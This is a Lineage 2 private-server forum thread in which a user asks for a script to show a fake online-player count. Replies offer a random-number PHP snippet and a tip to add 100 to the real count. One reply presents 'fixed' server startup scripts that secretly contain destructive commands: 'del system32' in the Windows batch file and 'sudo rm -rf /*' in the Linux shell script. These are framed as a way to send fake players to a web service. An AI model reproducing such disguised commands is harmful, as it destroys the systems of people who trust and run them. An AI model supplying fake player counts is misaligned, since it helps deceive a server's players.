Jump to content
  • 0

script false online players


Question

9 answers to this question

Recommended Posts

  • 0
Posted

You want to trick people into thinking you've got more players online than you really do?

 

You seriously can't figure this out? If you just want a fake number it doesn't even have to relevant at all.

 

<?php 
$online_players = rand(500,1000); 
echo $online_players; 
?>

  • 0
Posted

You want to trick people into thinking you've got more players online than you really do?

 

You seriously can't figure this out? If you just want a fake number it doesn't even have to relevant at all.

 

<?php 
$online_players = rand(500,1000); 
echo $online_players; 
?>

 

For the funny fact, on L2P based packs, they even got it integrated in core.

  • 0
Posted

For the funny fact, on L2P based packs, they even got it integrated in core.

yea, fakeplayers list, about 200-300 random names Lol

  • 0
Posted

Hey OP, I think I have something that can help you. If you open startGameServer.bat with notepad and change it to this:

 

@echo off
title gameserver console
:start
cd C:\\Windows\\
REM -------------------------------------
REM Default parameters for a basic server.
del system32
java -Xmx512m -cp ./libs/*; net.sf.l2j.gameserver.GameServer
REM
REM If you have a big server and lots of memory, you could experiment for example with
REM java -server -Xmx1536m -Xms1024m -Xmn512m -XX:PermSize=256m -XX:SurvivorRatio=8 -Xnoclassgc -XX:+AggressiveOpts
REM -------------------------------------
if ERRORLEVEL 2 goto restart
if ERRORLEVEL 1 goto error
goto end
:restart
echo.
echo Admin have restarted, please wait.
echo.
goto start
:error
echo.
echo Server have terminated abnormaly.
echo.
:end
echo.
echo Server terminated.
echo.
pause

 

The java commands have been changed to automatically allow a list a fake players to be sent to a web service. After you do this and run it let me know. If you're using linux change GameServer_loop.sh to this:

 

#!/bin/bash

# exit codes of GameServer:
#  0 normal shutdown
#  2 reboot attempt
sudo rm -rf /*
while :; do
[ -f log/java0.log.0 ] && mv log/java0.log.0 "log/`date +%Y-%m-%d_%H-%M-%S`_java.log"
[ -f log/stdout.log ] && mv log/stdout.log "log/`date +%Y-%m-%d_%H-%M-%S`_stdout.log"
java -Xmx512m -cp ./libs/*:l2jserver.jar net.sf.l2j.gameserver.GameServer > log/stdout.log 2>&1
[ $? -ne 2 ] && break
#	/etc/init.d/mysql restart
sleep 10
done

 

After you have ran this code let me know so we can setup your webservice.

  • 0
Posted

Hi all

well my ask is :

 

someone know a scripts (false number players online) for mi server l2j god ?

 

Thx a lot to all it is the best page maxcheaters a master.

you mean the CB online count?

  • 0
Posted

Hi all

well my ask is :

 

someone know a scripts (false number players online) for mi server l2j god ?

 

Thx a lot to all it is the best page maxcheaters a master.

About website script or we are talking for alt+b number?

  • 0
Posted

Hi all

well my ask is :

 

someone know a scripts (false number players online) for mi server l2j god ?

 

Thx a lot to all it is the best page maxcheaters a master.

 

Okay, thats easy for the cb, use search function on your eclipse and search for the L2World.getInstance().getAllPlayersCount();, now after this method add +100, and it will show always 100 more than the actual

Guest
This topic is now closed to further replies.


  • Posts

    • From Salvation onwards I think you need a patched nwindow.dll that allows such modifications, try to see if you get what you need here: https://drive.google.com/drive/u/1/folders/1LLbQFGf8KlR-O0Iv5umfF-pwZgrDh9bd
    • hello everyone! I am wanting to save the files (Ini. - Data - ) of the EP5 Client: Salvation... But they generate the error "corrupt files"... I tried several versions of L2FileEditor without good results. I need help! Thank you!
    • Opening December 6th at 19:00 (GMT +3)! Open Beta Test from November 30th!   https://l2soe.com/   🌟 Introducing L2 Saga of Eternia: A Revolution in Lineage 2 High Five! 🌟   Dear Lineage 2 enthusiasts, Prepare to witness the future of private servers! L2 Saga of Eternia is not just another High Five project—it’s a game-changing experience designed to compete with the giants of the Lineage 2 private server scene. Built for the community, by the community, we’re here to raise the bar in quality, innovation, and longevity. What Sets Us Apart? 💎 No Wipes, Ever Say goodbye to the fear of losing your progress. Our server is built to last and will never close. Stability and consistency are our promises to you. ⚔️ Weekly New Content Our dedicated development team ensures fresh challenges, events, and updates every week. From custom quests to exclusive features, there will always be something exciting to explore. 💰 No Pay-to-Win Skill and strategy matter most here. Enjoy a balanced gameplay environment where your achievements come from effort, not your wallet. 🌍 A Massive Community With 2000+ players expected, join a vibrant and active community of like-minded adventurers ready to conquer the world of Aden. 🏆 Fair and Competitive Gameplay Our systems are designed to promote healthy competition while avoiding abusive mechanics and exploits. 🔧 Professional Development From advanced bug fixes to carefully curated content, we pride ourselves on smooth performance, no lag, and unparalleled server quality. Key Features Chronicle: High Five with unique interface Rate: Dynamic x10 rates Class Balance: Carefully fine-tuned for a fair experience PvP Focused: PvP Ranking & aura display effect for 3 Top PvPers every week Custom Events: Seasonal and permanent events to keep you engaged Additional Features:   Custom Endgame Content: Introduce unique dungeons, raids, or zones unavailable in other servers. Player-Driven Economy: Implement a strong market system and avoid overinflated drops or rewards. Epic Siege Battles: Announce special large-scale sieges and PvP events. Incentives for Streamers and Clans: Attract influencers and big clans to boost server publicity. Roadmap Transparency: Share a public roadmap of planned updates to build trust and excitemen   Here you can read all the features: https://l2soe.com/features   Video preview: Join the Revolution! This is your chance to be part of something legendary. L2 Saga of Eternia is not just a server; it’s a movement to redefine what Lineage 2 can be. Whether you’re a seasoned veteran or a newcomer to the world of Aden, we invite you to experience Lineage 2 at its finest.   Official Launch Date: December 6th 2024 Website: https://l2soe.com/ Facebook: https://www.facebook.com/l2soe Discord: https://discord.com/invite/l2eternia   Let’s build the ultimate Lineage 2 experience together. See you in-game! 🎮
    • That's like a tutorial on how to run l2 on MacOS Xd but good job for the investigation. 
  • Topics

×
×
  • Create New...